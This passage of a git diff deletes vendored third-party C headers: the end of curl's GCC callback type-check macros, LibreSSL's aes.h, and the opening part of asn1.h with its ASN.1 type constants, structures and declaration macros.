-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback5) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback6) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback7) ||              \
-   _curl_callback_compatible((expr), _curl_ssl_ctx_callback8))
-typedef CURLcode (*_curl_ssl_ctx_callback1)(CURL *, void *, void *);
-typedef CURLcode (*_curl_ssl_ctx_callback2)(CURL *, void *, const void *);
-typedef CURLcode (*_curl_ssl_ctx_callback3)(CURL *, const void *, void *);
-typedef CURLcode (*_curl_ssl_ctx_callback4)(CURL *, const void *,
-                                            const void *);
-#ifdef HEADER_SSL_H
-/* hack: if we included OpenSSL's ssl.h, we know about SSL_CTX
- * this will of course break if we're included before OpenSSL headers...
- */
-typedef CURLcode (*_curl_ssl_ctx_callback5)(CURL *, SSL_CTX, void *);
-typedef CURLcode (*_curl_ssl_ctx_callback6)(CURL *, SSL_CTX, const void *);
-typedef CURLcode (*_curl_ssl_ctx_callback7)(CURL *, const SSL_CTX, void *);
-typedef CURLcode (*_curl_ssl_ctx_callback8)(CURL *, const SSL_CTX,
-                                           const void *);
-#else
-typedef _curl_ssl_ctx_callback1 _curl_ssl_ctx_callback5;
-typedef _curl_ssl_ctx_callback1 _curl_ssl_ctx_callback6;
-typedef _curl_ssl_ctx_callback1 _curl_ssl_ctx_callback7;
-typedef _curl_ssl_ctx_callback1 _curl_ssl_ctx_callback8;
-#endif
-
-/* evaluates to true if expr is of type curl_conv_callback or "similar" */
-#define _curl_is_conv_cb(expr)                                          \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_conv_callback) ||                   \
-   _curl_callback_compatible((expr), _curl_conv_callback1) ||                 \
-   _curl_callback_compatible((expr), _curl_conv_callback2) ||                 \
-   _curl_callback_compatible((expr), _curl_conv_callback3) ||                 \
-   _curl_callback_compatible((expr), _curl_conv_callback4))
-typedef CURLcode (*_curl_conv_callback1)(char *, size_t length);
-typedef CURLcode (*_curl_conv_callback2)(const char *, size_t length);
-typedef CURLcode (*_curl_conv_callback3)(void *, size_t length);
-typedef CURLcode (*_curl_conv_callback4)(const void *, size_t length);
-
-/* evaluates to true if expr is of type curl_seek_callback or "similar" */
-#define _curl_is_seek_cb(expr)                                          \
-  (_curl_is_NULL(expr) ||                                                     \
-   _curl_callback_compatible((expr), curl_seek_callback) ||                   \
-   _curl_callback_compatible((expr), _curl_seek_callback1) ||                 \
-   _curl_callback_compatible((expr), _curl_seek_callback2))
-typedef CURLcode (*_curl_seek_callback1)(void *, curl_off_t, int);
-typedef CURLcode (*_curl_seek_callback2)(const void *, curl_off_t, int);
-
-
-#endif /* __CURL_TYPECHECK_GCC_H */
diff --git a/thirdparty/libressl/include/openssl/aes.h b/thirdparty/libressl/include/openssl/aes.h
deleted file mode 100644
index c904485..0000000
--- a/thirdparty/libressl/include/openssl/aes.h
+++ /dev/null
@@ -1,126 +0,0 @@
-/* $OpenBSD: aes.h,v 1.14 2014/07/09 09:10:07 miod Exp $ */
-/* ====================================================================
- * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- */
-
-#ifndef HEADER_AES_H
-#define HEADER_AES_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_AES
-#error AES is disabled.
-#endif
-
-#include <stddef.h>
-
-#define AES_ENCRYPT	1
-#define AES_DECRYPT	0
-
-/* Because array size can't be a const in C, the following two are macros.
-   Both sizes are in bytes. */
-#define AES_MAXNR 14
-#define AES_BLOCK_SIZE 16
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* This should be a hidden type, but EVP requires that the size be known */
-struct aes_key_st {
-	unsigned int rd_key[4 *(AES_MAXNR + 1)];
-	int rounds;
-};
-typedef struct aes_key_st AES_KEY;
-
-const char *AES_options(void);
-
-int AES_set_encrypt_key(const unsigned char *userKey, const int bits,
-    AES_KEY *key);
-int AES_set_decrypt_key(const unsigned char *userKey, const int bits,
-    AES_KEY *key);
-
-void AES_encrypt(const unsigned char *in, unsigned char *out,
-    const AES_KEY *key);
-void AES_decrypt(const unsigned char *in, unsigned char *out,
-    const AES_KEY *key);
-
-void AES_ecb_encrypt(const unsigned char *in, unsigned char *out,
-    const AES_KEY *key, const int enc);
-void AES_cbc_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, const int enc);
-void AES_cfb128_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, int *num,
-    const int enc);
-void AES_cfb1_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, int *num,
-    const int enc);
-void AES_cfb8_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, int *num,
-    const int enc);
-void AES_ofb128_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, int *num);
-void AES_ctr128_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char ivec[AES_BLOCK_SIZE],
-    unsigned char ecount_buf[AES_BLOCK_SIZE], unsigned int *num);
-/* NB: the IV is _two_ blocks long */
-void AES_ige_encrypt(const unsigned char *in, unsigned char *out,
-    size_t length, const AES_KEY *key, unsigned char *ivec, const int enc);
-
-int AES_wrap_key(AES_KEY *key, const unsigned char *iv, unsigned char *out,
-    const unsigned char *in, unsigned int inlen);
-int AES_unwrap_key(AES_KEY *key, const unsigned char *iv, unsigned char *out,
-    const unsigned char *in, unsigned int inlen);
-
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif /* !HEADER_AES_H */
diff --git a/thirdparty/libressl/include/openssl/asn1.h b/thirdparty/libressl/include/openssl/asn1.h
deleted file mode 100644
index da16d5c..0000000
--- a/thirdparty/libressl/include/openssl/asn1.h
+++ /dev/null
@@ -1,1460 +0,0 @@
-/* $OpenBSD: asn1.h,v 1.43 2017/05/06 17:12:59 beck Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_ASN1_H
-#define HEADER_ASN1_H
-
-#include <time.h>
-
-#include <openssl/opensslconf.h>
-
-#ifndef OPENSSL_NO_BIO
-#include <openssl/bio.h>
-#endif
-#include <openssl/stack.h>
-#include <openssl/safestack.h>
-
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define V_ASN1_UNIVERSAL		0x00
-#define	V_ASN1_APPLICATION		0x40
-#define V_ASN1_CONTEXT_SPECIFIC		0x80
-#define V_ASN1_PRIVATE			0xc0
-
-#define V_ASN1_CONSTRUCTED		0x20
-#define V_ASN1_PRIMITIVE_TAG		0x1f
-#define V_ASN1_PRIMATIVE_TAG		0x1f
-
-#define V_ASN1_APP_CHOOSE		-2	/* let the recipient choose */
-#define V_ASN1_OTHER			-3	/* used in ASN1_TYPE */
-#define V_ASN1_ANY			-4	/* used in ASN1 template code */
-
-#define V_ASN1_NEG			0x100	/* negative flag */
-
-#define V_ASN1_UNDEF			-1
-#define V_ASN1_EOC			0
-#define V_ASN1_BOOLEAN			1	/**/
-#define V_ASN1_INTEGER			2
-#define V_ASN1_NEG_INTEGER		(2 | V_ASN1_NEG)
-#define V_ASN1_BIT_STRING		3
-#define V_ASN1_OCTET_STRING		4
-#define V_ASN1_NULL			5
-#define V_ASN1_OBJECT			6
-#define V_ASN1_OBJECT_DESCRIPTOR	7
-#define V_ASN1_EXTERNAL			8
-#define V_ASN1_REAL			9
-#define V_ASN1_ENUMERATED		10
-#define V_ASN1_NEG_ENUMERATED		(10 | V_ASN1_NEG)
-#define V_ASN1_UTF8STRING		12
-#define V_ASN1_SEQUENCE			16
-#define V_ASN1_SET			17
-#define V_ASN1_NUMERICSTRING		18	/**/
-#define V_ASN1_PRINTABLESTRING		19
-#define V_ASN1_T61STRING		20
-#define V_ASN1_TELETEXSTRING		20	/* alias */
-#define V_ASN1_VIDEOTEXSTRING		21	/**/
-#define V_ASN1_IA5STRING		22
-#define V_ASN1_UTCTIME			23
-#define V_ASN1_GENERALIZEDTIME		24	/**/
-#define V_ASN1_GRAPHICSTRING		25	/**/
-#define V_ASN1_ISO64STRING		26	/**/
-#define V_ASN1_VISIBLESTRING		26	/* alias */
-#define V_ASN1_GENERALSTRING		27	/**/
-#define V_ASN1_UNIVERSALSTRING		28	/**/
-#define V_ASN1_BMPSTRING		30
-
-/* For use with d2i_ASN1_type_bytes() */
-#define B_ASN1_NUMERICSTRING	0x0001
-#define B_ASN1_PRINTABLESTRING	0x0002
-#define B_ASN1_T61STRING	0x0004
-#define B_ASN1_TELETEXSTRING	0x0004
-#define B_ASN1_VIDEOTEXSTRING	0x0008
-#define B_ASN1_IA5STRING	0x0010
-#define B_ASN1_GRAPHICSTRING	0x0020
-#define B_ASN1_ISO64STRING	0x0040
-#define B_ASN1_VISIBLESTRING	0x0040
-#define B_ASN1_GENERALSTRING	0x0080
-#define B_ASN1_UNIVERSALSTRING	0x0100
-#define B_ASN1_OCTET_STRING	0x0200
-#define B_ASN1_BIT_STRING	0x0400
-#define B_ASN1_BMPSTRING	0x0800
-#define B_ASN1_UNKNOWN		0x1000
-#define B_ASN1_UTF8STRING	0x2000
-#define B_ASN1_UTCTIME		0x4000
-#define B_ASN1_GENERALIZEDTIME	0x8000
-#define B_ASN1_SEQUENCE		0x10000
-
-/* For use with ASN1_mbstring_copy() */
-#define MBSTRING_FLAG		0x1000
-#define MBSTRING_UTF8		(MBSTRING_FLAG)
-#define MBSTRING_ASC		(MBSTRING_FLAG|1)
-#define MBSTRING_BMP		(MBSTRING_FLAG|2)
-#define MBSTRING_UNIV		(MBSTRING_FLAG|4)
-
-#define SMIME_OLDMIME		0x400
-#define SMIME_CRLFEOL		0x800
-#define SMIME_STREAM		0x1000
-
-struct X509_algor_st;
-DECLARE_STACK_OF(X509_ALGOR)
-
-#define DECLARE_ASN1_SET_OF(type) /* filled in by mkstack.pl */
-#define IMPLEMENT_ASN1_SET_OF(type) /* nothing, no longer needed */
-
-/* We MUST make sure that, except for constness, asn1_ctx_st and
-   asn1_const_ctx are exactly the same.  Fortunately, as soon as
-   the old ASN1 parsing macros are gone, we can throw this away
-   as well... */
-typedef struct asn1_ctx_st {
-	unsigned char *p;/* work char pointer */
-	int eos;	/* end of sequence read for indefinite encoding */
-	int error;	/* error code to use when returning an error */
-	int inf;	/* constructed if 0x20, indefinite is 0x21 */
-	int tag;	/* tag from last 'get object' */
-	int xclass;	/* class from last 'get object' */
-	long slen;	/* length of last 'get object' */
-	unsigned char *max; /* largest value of p allowed */
-	unsigned char *q;/* temporary variable */
-	unsigned char **pp;/* variable */
-	int line;	/* used in error processing */
-} ASN1_CTX;
-
-typedef struct asn1_const_ctx_st {
-	const unsigned char *p;/* work char pointer */
-	int eos;	/* end of sequence read for indefinite encoding */
-	int error;	/* error code to use when returning an error */
-	int inf;	/* constructed if 0x20, indefinite is 0x21 */
-	int tag;	/* tag from last 'get object' */
-	int xclass;	/* class from last 'get object' */
-	long slen;	/* length of last 'get object' */
-	const unsigned char *max; /* largest value of p allowed */
-	const unsigned char *q;/* temporary variable */
-	const unsigned char **pp;/* variable */
-	int line;	/* used in error processing */
-} ASN1_const_CTX;
-
-/* These are used internally in the ASN1_OBJECT to keep track of
- * whether the names and data need to be free()ed */
-#define ASN1_OBJECT_FLAG_DYNAMIC	 0x01	/* internal use */
-#define ASN1_OBJECT_FLAG_CRITICAL	 0x02	/* critical x509v3 object id */
-#define ASN1_OBJECT_FLAG_DYNAMIC_STRINGS 0x04	/* internal use */
-#define ASN1_OBJECT_FLAG_DYNAMIC_DATA 	 0x08	/* internal use */
-typedef struct asn1_object_st {
-	const char *sn, *ln;
-	int nid;
-	int length;
-	const unsigned char *data;	/* data remains const after init */
-	int flags;	/* Should we free this one */
-} ASN1_OBJECT;
-
-#define ASN1_STRING_FLAG_BITS_LEFT 0x08 /* Set if 0x07 has bits left value */
-/* This indicates that the ASN1_STRING is not a real value but just a place
- * holder for the location where indefinite length constructed data should
- * be inserted in the memory buffer
- */
-#define ASN1_STRING_FLAG_NDEF 0x010
-
-/* This flag is used by the CMS code to indicate that a string is not
- * complete and is a place holder for content when it had all been
- * accessed. The flag will be reset when content has been written to it.
- */
-
-#define ASN1_STRING_FLAG_CONT 0x020
-/* This flag is used by ASN1 code to indicate an ASN1_STRING is an MSTRING
- * type.
- */
-#define ASN1_STRING_FLAG_MSTRING 0x040
-/* This is the base type that holds just about everything :-) */
-struct asn1_string_st {
-	int length;
-	int type;
-	unsigned char *data;
-	/* The value of the following field depends on the type being
-	 * held.  It is mostly being used for BIT_STRING so if the
-	 * input data has a non-zero 'unused bits' value, it will be
-	 * handled correctly */
-	long flags;
-};
-
-/* ASN1_ENCODING structure: this is used to save the received
- * encoding of an ASN1 type. This is useful to get round
- * problems with invalid encodings which can break signatures.
- */
-
-typedef struct ASN1_ENCODING_st {
-	unsigned char *enc;	/* DER encoding */
-	long len;		/* Length of encoding */
-	int modified;		 /* set to 1 if 'enc' is invalid */
-} ASN1_ENCODING;
-
-/* Used with ASN1 LONG type: if a long is set to this it is omitted */
-#define ASN1_LONG_UNDEF	0x7fffffffL
-
-#define STABLE_FLAGS_MALLOC	0x01
-#define STABLE_NO_MASK		0x02
-#define DIRSTRING_TYPE	\
- (B_ASN1_PRINTABLESTRING|B_ASN1_T61STRING|B_ASN1_BMPSTRING|B_ASN1_UTF8STRING)
-#define PKCS9STRING_TYPE (DIRSTRING_TYPE|B_ASN1_IA5STRING)
-
-typedef struct asn1_string_table_st {
-	int nid;
-	long minsize;
-	long maxsize;
-	unsigned long mask;
-	unsigned long flags;
-} ASN1_STRING_TABLE;
-
-DECLARE_STACK_OF(ASN1_STRING_TABLE)
-
-/* size limits: this stuff is taken straight from RFC2459 */
-
-#define ub_name				32768
-#define ub_common_name			64
-#define ub_locality_name		128
-#define ub_state_name			128
-#define ub_organization_name		64
-#define ub_organization_unit_name	64
-#define ub_title			64
-#define ub_email_address		128
-
-/* Declarations for template structures: for full definitions
- * see asn1t.h
- */
-typedef struct ASN1_TEMPLATE_st ASN1_TEMPLATE;
-typedef struct ASN1_TLC_st ASN1_TLC;
-/* This is just an opaque pointer */
-typedef struct ASN1_VALUE_st ASN1_VALUE;
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Declare ASN1 functions: the implement macro in in asn1t.h */
-
-#define DECLARE_ASN1_FUNCTIONS(type) DECLARE_ASN1_FUNCTIONS_name(type, type)
-
-#define DECLARE_ASN1_ALLOC_FUNCTIONS(type) \
-	DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, type)
-
-#define DECLARE_ASN1_FUNCTIONS_name(type, name) \
-	DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
-	DECLARE_ASN1_ENCODE_FUNCTIONS(type, name, name)
-
-#define DECLARE_ASN1_FUNCTIONS_fname(type, itname, name) \
-	DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
-	DECLARE_ASN1_ENCODE_FUNCTIONS(type, itname, name)
-
-#define	DECLARE_ASN1_ENCODE_FUNCTIONS(type, itname, name) \
-	type *d2i_##name(type **a, const unsigned char **in, long len); \
-	int i2d_##name(type *a, unsigned char **out); \
-	DECLARE_ASN1_ITEM(itname)
-
-#define	DECLARE_ASN1_ENCODE_FUNCTIONS_const(type, name) \
-	type *d2i_##name(type **a, const unsigned char **in, long len); \
-	int i2d_##name(const type *a, unsigned char **out); \
-	DECLARE_ASN1_ITEM(name)
-
-#define	DECLARE_ASN1_NDEF_FUNCTION(name) \
-	int i2d_##name##_NDEF(name *a, unsigned char **out);
-
-#define DECLARE_ASN1_FUNCTIONS_const(name) \
-	DECLARE_ASN1_ALLOC_FUNCTIONS(name) \
-	DECLARE_ASN1_ENCODE_FUNCTIONS_const(name, name)
-
-#define DECLARE_ASN1_ALLOC_FUNCTIONS_name(type, name) \
-	type *name##_new(void); \
-	void name##_free(type *a);
-
-#define DECLARE_ASN1_PRINT_FUNCTION(stname) \
-	DECLARE_ASN1_PRINT_FUNCTION_fname(stname, stname)
-
-#define DECLARE_ASN1_PRINT_FUNCTION_fname(stname, fname) \
-	int fname##_print_ctx(BIO *out, stname *x, int indent, \
-					 const ASN1_PCTX *pctx);
-
-#endif /* !LIBRESSL_INTERNAL */
-
-#define D2I_OF(type) type *(*)(type **,const unsigned char **,long)
-#define I2D_OF(type) int (*)(type *,unsigned char **)
-#define I2D_OF_const(type) int (*)(const type *,unsigned char **)
-
-#define CHECKED_D2I_OF(type, d2i) \
-    ((d2i_of_void*) (1 ? d2i : ((D2I_OF(type))0)))
-#define CHECKED_I2D_OF(type, i2d) \
-    ((i2d_of_void*) (1 ? i2d : ((I2D_OF(type))0)))
-#define CHECKED_NEW_OF(type, xnew) \
-    ((void *(*)(void)) (1 ? xnew : ((type *(*)(void))0)))
-#define CHECKED_PTR_OF(type, p) \
-    ((void*) (1 ? p : (type*)0))
-#define CHECKED_PPTR_OF(type, p) \
-    ((void**) (1 ? p : (type**)0))
-
-#define TYPEDEF_D2I_OF(type) typedef type *d2i_of_##type(type **,const unsigned char **,long)
-#define TYPEDEF_I2D_OF(type) typedef int i2d_of_##type(type *,unsigned char **)
-#define TYPEDEF_D2I2D_OF(type) TYPEDEF_D2I_OF(type); TYPEDEF_I2D_OF(type)
-
-TYPEDEF_D2I2D_OF(void);
-
-/* The following macros and typedefs allow an ASN1_ITEM
- * to be embedded in a structure and referenced. Since
- * the ASN1_ITEM pointers need to be globally accessible
- * (possibly from shared libraries) they may exist in
- * different forms. On platforms that support it the
- * ASN1_ITEM structure itself will be globally exported.
- * Other platforms will export a function that returns
- * an ASN1_ITEM pointer.
- *
- * To handle both cases transparently the macros below
- * should be used instead of hard coding an ASN1_ITEM
- * pointer in a structure.
- *
- * The structure will look like this:
- *
- * typedef struct SOMETHING_st {
- *      ...
- *      ASN1_ITEM_EXP *iptr;
- *      ...
- * } SOMETHING;
- *
- * It would be initialised as e.g.:
- *
- * SOMETHING somevar = {...,ASN1_ITEM_ref(X509),...};
- *
- * and the actual pointer extracted with:
- *
- * const ASN1_ITEM *it = ASN1_ITEM_ptr(somevar.iptr);
- *
- * Finally an ASN1_ITEM pointer can be extracted from an
- * appropriate reference with: ASN1_ITEM_rptr(X509). This
- * would be used when a function takes an ASN1_ITEM * argument.
- *
- */
-
-/* ASN1_ITEM pointer exported type */
-typedef const ASN1_ITEM ASN1_ITEM_EXP;
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Macro to obtain ASN1_ITEM pointer from exported type */
-#define ASN1_ITEM_ptr(iptr) (iptr)
-
-/* Macro to include ASN1_ITEM pointer from base type */
-#define ASN1_ITEM_ref(iptr) (&(iptr##_it))
-
-#define ASN1_ITEM_rptr(ref) (&(ref##_it))
-
-#define DECLARE_ASN1_ITEM(name) \
-	extern const ASN1_ITEM name##_it;
-
-#endif /* !LIBRESSL_INTERNAL */
-
-/* Parameters used by ASN1_STRING_print_ex() */
-
-/* These determine which characters to escape:
- * RFC2253 special characters, control characters and
- * MSB set characters
- */
-
-#define ASN1_STRFLGS_ESC_2253		1
-#define ASN1_STRFLGS_ESC_CTRL		2
-#define ASN1_STRFLGS_ESC_MSB		4
-
-
-/* This flag determines how we do escaping: normally
- * RC2253 backslash only, set this to use backslash and
- * quote.
- */
-
-#define ASN1_STRFLGS_ESC_QUOTE		8
-
-
-/* These three flags are internal use only. */
-
-/* Character is a valid PrintableString character */
-#define CHARTYPE_PRINTABLESTRING	0x10
-/* Character needs escaping if it is the first character */
-#define CHARTYPE_FIRST_ESC_2253		0x20
-/* Character needs escaping if it is the last character */
-#define CHARTYPE_LAST_ESC_2253		0x40
-
-/* NB the internal flags are safely reused below by flags
- * handled at the top level.
- */
-
-/* If this is set we convert all character strings
- * to UTF8 first
- */
-
-#define ASN1_STRFLGS_UTF8_CONVERT	0x10
-
-/* If this is set we don't attempt to interpret content:
- * just assume all strings are 1 byte per character. This
- * will produce some pretty odd looking output!
- */
-
-#define ASN1_STRFLGS_IGNORE_TYPE	0x20
-
-/* If this is set we include the string type in the output */
-#define ASN1_STRFLGS_SHOW_TYPE		0x40
-
-/* This determines which strings to display and which to
- * 'dump' (hex dump of content octets or DER encoding). We can
- * only dump non character strings or everything. If we
- * don't dump 'unknown' they are interpreted as character
- * strings with 1 octet per character and are subject to
- * the usual escaping options.
- */
-
-#define ASN1_STRFLGS_DUMP_ALL		0x80
-#define ASN1_STRFLGS_DUMP_UNKNOWN	0x100
-
-/* These determine what 'dumping' does, we can dump the
- * content octets or the DER encoding: both use the
- * RFC2253 #NNNNN notation.
- */
-
-#define ASN1_STRFLGS_DUMP_DER		0x200
-
-/* All the string flags consistent with RFC2253,
- * escaping control characters isn't essential in
- * RFC2253 but it is advisable anyway.
- */
-
-#define ASN1_STRFLGS_RFC2253	(ASN1_STRFLGS_ESC_2253 | \
-				ASN1_STRFLGS_ESC_CTRL | \
-				ASN1_STRFLGS_ESC_MSB | \
-				ASN1_STRFLGS_UTF8_CONVERT | \
-				ASN1_STRFLGS_DUMP_UNKNOWN | \
-				ASN1_STRFLGS_DUMP_DER)
-
-DECLARE_STACK_OF(ASN1_INTEGER)
-
-DECLARE_STACK_OF(ASN1_GENERALSTRING)
-
-typedef struct asn1_type_st {
-	int type;
-	union {
-		char *ptr;
-		ASN1_BOOLEAN		boolean;
-		ASN1_STRING *		asn1_string;
-		ASN1_OBJECT *		object;
-		ASN1_INTEGER *		integer;
-		ASN1_ENUMERATED *	enumerated;
-		ASN1_BIT_STRING *	bit_string;
-		ASN1_OCTET_STRING *	octet_string;
-		ASN1_PRINTABLESTRING *	printablestring;
-		ASN1_T61STRING *	t61string;
-		ASN1_IA5STRING *	ia5string;
-		ASN1_GENERALSTRING *	generalstring;
-		ASN1_BMPSTRING *	bmpstring;
-		ASN1_UNIVERSALSTRING *	universalstring;
-		ASN1_UTCTIME *		utctime;
-		ASN1_GENERALIZEDTIME *	generalizedtime;
-		ASN1_VISIBLESTRING *	visiblestring;
-		ASN1_UTF8STRING *	utf8string;
-		/* set and sequence are left complete and still
-		 * contain the set or sequence bytes */
-		ASN1_STRING *		set;
-		ASN1_STRING *		sequence;
-		ASN1_VALUE *		asn1_value;
-	} value;
-} ASN1_TYPE;
-
-DECLARE_STACK_OF(ASN1_TYPE)
-
-typedef STACK_OF(ASN1_TYPE) ASN1_SEQUENCE_ANY;
-
-ASN1_SEQUENCE_ANY *d2i_ASN1_SEQUENCE_ANY(ASN1_SEQUENCE_ANY **a, const unsigned char **in, long len);
-int i2d_ASN1_SEQUENCE_ANY(const ASN1_SEQUENCE_ANY *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_SEQUENCE_ANY_it;
-ASN1_SEQUENCE_ANY *d2i_ASN1_SET_ANY(ASN1_SEQUENCE_ANY **a, const unsigned char **in, long len);
-int i2d_ASN1_SET_ANY(const ASN1_SEQUENCE_ANY *a, unsigned char **out);
-extern const ASN1_ITEM ASN1_SET_ANY_it;
-
-typedef struct NETSCAPE_X509_st {
-	ASN1_OCTET_STRING *header;
-	X509 *cert;
-} NETSCAPE_X509;
-
-/* This is used to contain a list of bit names */
-typedef struct BIT_STRING_BITNAME_st {
-	int bitnum;
-	const char *lname;
-	const char *sname;
-} BIT_STRING_BITNAME;
-
-#ifndef LIBRESSL_INTERNAL
-
-#define M_ASN1_STRING_length(x)	((x)->length)
-#define M_ASN1_STRING_length_set(x, n)	((x)->length = (n))
-#define M_ASN1_STRING_type(x)	((x)->type)
-#define M_ASN1_STRING_data(x)	((x)->data)
-
-/* Macros for string operations */
-#define M_ASN1_BIT_STRING_new()	(ASN1_BIT_STRING *)\
-		ASN1_STRING_type_new(V_ASN1_BIT_STRING)
-#define M_ASN1_BIT_STRING_free(a)	ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_BIT_STRING_dup(a) (ASN1_BIT_STRING *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_ASN1_BIT_STRING_cmp(a,b) ASN1_STRING_cmp(\
-		(const ASN1_STRING *)a,(const ASN1_STRING *)b)
-#define M_ASN1_BIT_STRING_set(a,b,c) ASN1_STRING_set((ASN1_STRING *)a,b,c)
-
-#define M_ASN1_INTEGER_new()	(ASN1_INTEGER *)\
-		ASN1_STRING_type_new(V_ASN1_INTEGER)
-#define M_ASN1_INTEGER_free(a)		ASN1_STRING_free((ASN1_STRING *)a)
-#define M_ASN1_INTEGER_dup(a) (ASN1_INTEGER *)\
-		ASN1_STRING_dup((const ASN1_STRING *)a)
-#define M_ASN1_INTEGER_cmp(a,b)	ASN1_STRING_cmp(\
-		(const ASN1_STRING *)a,(const ASN1_STRING *)b)
-
-#define M_ASN1_ENUMERATED_new()	(ASN1_ENUMERATED *)\
